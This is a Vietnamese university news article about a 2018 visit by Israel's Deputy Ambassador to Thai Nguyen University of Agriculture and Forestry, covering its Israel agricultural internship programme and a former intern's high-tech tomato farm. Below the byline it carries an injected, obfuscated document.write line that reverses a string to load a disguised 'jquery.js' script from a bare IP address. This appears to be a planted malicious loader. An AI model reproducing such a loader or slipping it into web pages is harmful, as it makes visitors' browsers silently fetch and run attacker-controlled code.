Đại sứ quán Israel thăm và làm việc tại trường Đại học Nông lâm Thái Nguyên về Chương trình Thực tập nghề Israel

Ngày 03/01/2018, Trường Đại học Nông Lâm Thái Nguyên vinh dự đón Ngài Phó Đại sứ nước Israel, ông Doron Lebovich và bà Nguyễn Bảo An – Chuyên viên ngoại giao Đại sứ quán Israel tại Việt Nam đến thăm và làm việc tại trường.

Đón đoàn công tác gồm có PGS. TS. Trần Văn Điền – Hiệu trưởng Nhà trường, PGS. TS. Hoàng Thị Bích Thảo – Giám đốc Trung tâm Đào tạo và Phát triển Quốc tế và Th.S Nguyễn Thị Mai Thu – Phó Giám đốc Trung tâm Đào tạo và Phát triển Quốc tế.

Trường Đại học Nông Lâm Thái Nguyên vinh dự đón Ngài Phó Đại sứ nước Israel tới làm việc tại trường

Tại buổi làm việc, lãnh đạo Nhà trường đã chia sẻ về sự thành công của Chương trình Thực tập nghề Israel dành cho sinh viên của Nhà trường trong suốt hơn 10 năm vừa qua. Từ những phản hồi tích cực từ phía sinh viên dành cho Chương trình và nhận thấy cơ hội được thực hành chính những kiến thức nông nghiệp liên quan tới Chương trình học đại học của sinh viên, Nhà trường đã hoàn thiện Đề án Thực tập tốt nghiệp tại nước ngoài dành cho sinh viên của trường Đại học Nông lâm. Việc sinh viên đi thực tập tại Israel được tính tương đương 10 tín chỉ thực tập tốt nghiệp giúp cho sinh viên ý thức hơn về tầm quan trọng của việc học hỏi từ đó gặt hái được nhiều kiến thức hơn thông qua việc đi thực tập nước ngoài.

Lãnh đạo Nhà trường và lãnh đạo Trung tâm Đào tạo và Phát triển Quốc tế phát biểu tại buổi họp

Phát biểu tại buổi làm việc, ngài Phó Đại sứ bày tỏ sự cảm kích trước sự tiếp đón trang trọng và ấm cúng từ phía Trường Đại học Nông lâm. Ngài cũng cho biết đã nhận được sự dánh giá rất cao từ phía Trung tâm Đào tạo Nông nghiệp Quốc tế Israel (AICAT) và Trung tâm Agrostudies, Israel về chất lượng sinh viên của trường khi tham gia Chương trình. Đây là một trong những lý do khiến Ngài Phó Đại sứ lựa chọn trường Đại học Nông lâm để ghé thăm nhân dịp đầu năm mới. Ông mong muốn nhà trường tiếp tục  đào tạo, định hướng tới sinh viên để các em xác định được mục tiêu học tập, rèn luyện của bản thân mình cũng như có sự chuẩn bị tốt nhất về kiến thức, khả năng ngoại ngữ trước khi tham gia Chương trình Thực tập nghề tại Israel.

Lãnh đạo Nhà trường chụp ảnh lưu niệm với Ngài phó Đại sứ và chuyên viên Đại sứ quán Israel tại Việt Nam

Trong khuôn khổ của chuyến thăm, Ngài Phó Đại sứ và đại diện Đại sứ quán đi thăm quan trường Đại học, khu ký túc xá của sinh viên, khuôn viên trường và đặc biệt là sự ghé thăm tới trang trại nông nghiệp công nghệ cao của sinh viên Hoàng Trường Anh – Cựu sinh viên Chương trình Thực tập nghề Israel năm 2011, áp dụng chính các công nghệ mà Trường Anh đã học được từ đất nước Israel. Ngài Phó Đại sứ cho biết ông cảm thấy rất vui khi được nhìn thấy một mô hình thực tế của trang trại từ đất nước mình, được ứng dụng để giúp sinh viên nông nghiệp tại trường có địa điểm thực tập và tạo ra những sản phẩm nông nghiệp sạch cung cấp cho thị trường, và mô hình này lại được xây dựng lên từ chính một sinh viên trưởng thành từ Chương trình.

Đoàn làm việc đi thăm trang trại cà chua trồng theo công nghệ Israel

Lãnh đạo Trung tâm tự hào chia sẻ rằng đây là một trong những sinh viên  trở về từ Israel đã tự khởi nghiệp bằng chính những kiến thức nông nghiệp mình tích lũy được sau kì thực tập nghề.

Kết thúc buổi làm việc Ngài Phó Đại sứ mong muốn Chương trình Thực tập nghề Israel của Trường Đại học Nông lâm Thái Nguyên ngày càng phát triển cả về chất lượng và số lượng, tiếp tục là cái nôi cho những ý tưởng về nông nghiệp công nghiệp cao, là nơi khởi nguồn và chắp cánh cho ước mơ của những bạn trẻ yêu nông nghiệp từ Trường Đại học Nông lâm Thái Nguyên nói riêng và các bạn sinh viên trẻ trên cả nước nói chung.

Mai Thu, TT ĐT&PTQT

document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))

Bài Viết Liên Quan